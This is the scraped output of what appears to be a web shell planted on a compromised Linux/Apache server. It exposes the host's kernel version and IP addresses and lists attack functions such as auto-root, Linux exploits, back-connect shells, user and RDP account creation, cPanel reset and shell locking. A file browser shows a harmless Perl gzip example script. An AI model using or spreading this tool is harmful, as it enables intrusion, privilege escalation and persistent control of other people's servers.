Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.6.29
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-IO-Compress-2.061 /
io /
gzip /
[ HOME SHELL ]
Name
Size
Permission
Action
gzappend
399
B
-rw-r--r--
gzcat
498
B
-rw-r--r--
gzgrep
796
B
-rw-r--r--
gzstream
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gzstream
#!/usr/bin/perl use strict ; use warnings ; use IO::Compress::Gzip qw(gzip $GzipError); gzip '-' => '-', Minimal => 1 or die "gzstream: $GzipError\n" ; #exit 0; __END__ #my $gz = new IO::Compress::Gzip *STDOUT my $gz = new IO::Compress::Gzip '-' or die "gzstream: Cannot open stdout as gzip stream: $GzipError\n" ; while (<>) { $gz->write($_) or die "gzstream: Error writing gzip output stream: $GzipError\n" ; } $gz->close or die "gzstream: Error closing gzip output stream: $GzipError\n" ;
Close